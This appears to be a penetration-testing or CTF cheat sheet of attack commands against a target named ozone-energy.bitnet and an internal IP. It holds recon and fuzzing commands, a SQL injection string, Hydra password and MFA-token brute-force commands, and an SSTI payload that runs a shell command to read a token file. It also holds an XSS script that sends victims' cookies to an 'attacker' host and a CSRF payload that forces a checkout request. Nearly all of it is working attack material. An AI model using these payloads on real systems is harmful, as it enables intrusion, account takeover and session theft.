IM

wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://ozone-energy.bitnet

a

nmap -sV -p80 ozone-energy.bitnet

wapiti -u http://ozone-energy.bitnet -m all

dirb http://ozone-energy.bitnet /usr/share/wordlists/custom/ozone-wordlist.txt.

" or "1"="1

hydra -l wscarlett -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/[LOGINPAGE]:username=^USER^&password=^PASS^&Login=Login:Invalid Password"

hydra -l jschmidt -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/login:username=^USER^&password=^PASS^&Login=Login:Invalid Username or Password"

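SSTI (server-side template injection; the expression below is evaluated by the template engine when user input is rendered as template source instead of being passed in as data):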

{{request.application.globals.builtins.import('os').popen('cat /tmp/t0k3n.txt').read()}}

-----------------------------------------------------------------------------

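MFA token guessing (only feasible when the token prompt has no attempt limit or lockout; the numeric list is presumably the list.txt used below):

cat generate.sh for i in seq 2023 9999; do printf "%0003d\n" $i; done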

hydra -l admin -P /home/kali/Downloads/list.txt 10.102.11.237 http-form-post "/prompt:username=^USER^&mfa_token=^PASS^&Login=Login:Invalid token, please try again."

------------------------------------------------------------------------------

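// CSRF & XSS cookie theft - requires a steal.php on the listener host to log incoming requests. document.cookie only exposes cookies that were set without the HttpOnly flag.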

Cookie-stealing payload:

<script>
var i=new image();
i.src="http://attacker/steal.php?q="+document.cookie;
</script>


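Cross-Site Request Forgery (the request rides on the victim's session cookie; it works only if the endpoint changes state on a GET and checks no anti-CSRF token):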

<script>
var i= new Image();
i.src="http://site.com/finalize_checkout.php?itemList=1%2C1&itemquantity=1%2C1";
</script>
